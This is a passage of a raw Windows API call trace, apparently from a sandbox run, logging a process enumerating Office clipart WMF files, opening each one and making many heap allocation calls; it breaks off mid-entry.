Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.078] AreFileApisANSI () returned 1 [0102.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 69 [0102.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.078] GetFileType (hFile=0x33c) returned 0x1 [0102.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.078] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.078] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.078] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.079] CloseHandle (hObject=0x33c) returned 1 [0102.079] AreFileApisANSI () returned 1 [0102.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0102.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 69 [0102.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.079] GetFileType (hFile=0x33c) returned 0x1 [0102.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.079] CloseHandle (hObject=0x33c) returned 1 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0102.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0102.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.080] AreFileApisANSI () returned 1 [0102.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 69 [0102.080] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60ca)) returned 1 [0102.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0102.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.081] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb7c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD08808_.WMF", cAlternateFileName="")) returned 1 [0102.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0102.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0102.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.193] AreFileApisANSI () returned 1 [0102.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0102.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0102.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.193] AreFileApisANSI () returned 1 [0102.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 69 [0102.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.194] GetFileType (hFile=0x33c) returned 0x1 [0102.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.195] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.195] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.195] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.195] CloseHandle (hObject=0x33c) returned 1 [0102.195] AreFileApisANSI () returned 1 [0102.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 69 [0102.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.196] GetFileType (hFile=0x33c) returned 0x1 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.196] CloseHandle (hObject=0x33c) returned 1 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.197] AreFileApisANSI () returned 1 [0102.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0102.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 69 [0102.197] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb7c)) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0102.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.198] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d0e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD08868_.WMF", cAlternateFileName="")) returned 1 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.198] HeapFree (in: 